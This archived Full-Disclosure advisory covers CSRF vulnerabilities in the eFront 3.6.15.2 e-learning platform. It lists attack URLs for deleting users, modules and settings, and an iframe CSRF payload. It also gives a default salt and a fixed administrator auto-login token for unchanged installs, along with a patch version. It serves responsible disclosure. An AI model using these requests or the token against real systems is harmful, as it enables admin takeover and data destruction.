lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <CALH-=7yzpmsBf4OR_heFnkHwcOtGAzB1ETvD3mKo0nJZm8nKiA@mail.gmail.com>
Date: Thu, 5 Feb 2015 07:18:50 +0100
From: Steffen Rösemann <steffen.roesemann1986@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] Multiple CSRF vulnerabilities in eFront v. 3.6.15.2 (CE)

Advisory: Multiple CSRF vulnerabilities in eFront v. 3.6.15.2 (CE)
Advisory ID: SROEADV-2015-09
Author: Steffen Rösemann
Affected Software: eFront v. 3.6.15.2 (CE) (Release-date: 05-Dec-2014,
build 18021)
Vendor URL: http://www.efrontlearning.net
Vendor Status: patched
CVE-ID: -

Tested with/on:

-Browser: Firefox 35, Iceweasel 31.3.0
-OS: Mac OS X 10.10 (XAMPP installation), Kali Linux 1.0.9a (Apache2,
MySQL)

==========================
Vulnerability Description:
==========================

The E-learning platform eFront v. 3.6.15.2 (Community Edition, build 18021)
suffers from multiple CSRF vulnerabilities.

==================
Technical Details:
==================

The vulnerabilities can be found in different modules that are all used in
the administrator.php file:

ctg=modules (delete and deactivate/activate modules):

http://
{TARGET}/www/administrator.php?ctg=modules&delete_module={MODULE_NAME}&ajax=ajax
http://
{TARGET}/www/administrator.php?ctg=modules&deactivate_module={MODULE_NAME}&ajax=ajax
http://
{TARGET}/www/administrator.php?ctg=modules&activate_module={MODULE_NAME}&ajax=ajax

ctg=users (delete and deactivate/activate users):

http://
{TARGET}/www/administrator.php?ctg=users&activate_user={USER_NAME}&ajax=ajax
http://
{TARGET}/www/administrator.php?ctg=users&deactivate_user={USER_NAME}&ajax=ajax
http://
{TARGET}/www/administrator.php?ctg=users&delete_user={USER_NAME}&ajax=ajax

ctg=themes (activate/deactivate and delete themes):

http://
{TARGET}/www/administrator.php?ctg=themes&tab=set_theme&set_theme={THEME_ID}&ajax=ajax
http://
{TARGET}/www/administrator.php?ctg=themes&tab=set_theme&delete={THEME_ID}&ajax=ajax

ctg=digest (deactivate/activate and delete events, e.g. deactivate user
registration, deactivate email for account activation)

e.g. EVENT_ID 3 = user email activation
e.g. EVENT_ID 4 = user registration

http://
{TARGET}/www/administrator.php?ctg=digests&postAjaxRequest=1&deactivate_notification={EVENT_ID}&event=1&ajax=ajax
http://
{TARGET}/www/administrator.php?ctg=digests&postAjaxRequest=1&activate_notification={EVENT_ID}&event=1&ajax=ajax
http://
{TARGET}/www/administrator.php?ctg=digests&delete_notification={EVENT_ID}&ajax=1&event=1

ctg=languages (deactivate/activate and delete language settings)

e.g. LANGUAGE_NAME = german

http://
{TARGET}/www/administrator.php?ctg=languages&activate_language={LANGUAGE_NAME}&ajax=ajax
http://
{TARGET}/www/administrator.php?ctg=languages&deactivate_language={LANGUAGE_NAME}&ajax=ajax
http://
{TARGET}/www/administrator.php?ctg=languages&delete_language={LANGUAGE_NAME}&ajax=ajax


Exploit-Example (valid for all above listed vulnerabilities):

<iframe src="http://
{TARGET}/www/administrator.php?ctg=digests&delete_notification={EVENT_ID}&ajax=1&event=1"></iframe>


The following CSRF-vulnerability can be abused to activate/deactivate the
auto-login feature of an arbitrary user:

http://{TARGET}/www/administrator.php?ctg=maintenance&postAjaxRequest=1&autologin=1&login={USERNAME}&ajax=ajax


That makes it possible to login via a URL in an arbitrary user-account like
in the following example without providing any login-credentials:

http://{TARGET}/www/index.php?autologin={AUTO_LOGIN_TOKEN}

eFront creates three standard user-accounts while the installation process.
One of it is the administrators account.

The components being used for creating the auto-login token are the
following informations:

- a salt
- the accounts creation date
- the username

The salt isn't generated dynamically during the installation. On a common
eFront installation without any changes by the administrator, it has the
value cDWQR#$Rcxsc. The admin accounts creation date has the standard value
1365149958.

As the standard administrators accountname is "admin", the auto-login token
for the administrators account of eFront has always the value
eb514ea3c45d74a1218e207fb4b345b1 if the precondition is fulfilled, that
none of the above mentioned values were changed after the installation.

That makes it possible for an attacker to abuse the CSRF-vulnerability to
gain access to the administrators account.



=========
Solution:
=========

Upgrade to eFront v. 3.6.15.3, build 18022.


====================
Disclosure Timeline:
====================
14/15-Jan-2015 – found the vulnerability
15-Jan-2015 - informed the developers (see [3])
15-Jan-2015 – release date of this security advisory [without technical
details]
15-Jan-2015 - vendor responded, announces a patch
05-Feb-2015 - vendor released patch (v. 3.6.15.3, build 18022)
05-Feb-2015 - release date of this security advisory
05-Feb-2015 - send to FullDisclosure


========
Credits:
========

Vulnerability found and advisory written by Steffen Rösemann.

===========
References:
===========

[1] http://www.efrontlearning.net
[2] http://sroesemann.blogspot.de/2015/01/sroeadv-2015-09.html
[3] https://github.com/epignosis/efront_open_source/issues/7
[4]
http://sroesemann.blogspot.de/2015/01/report-for-advisory-sroeadv-2015-09.html

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists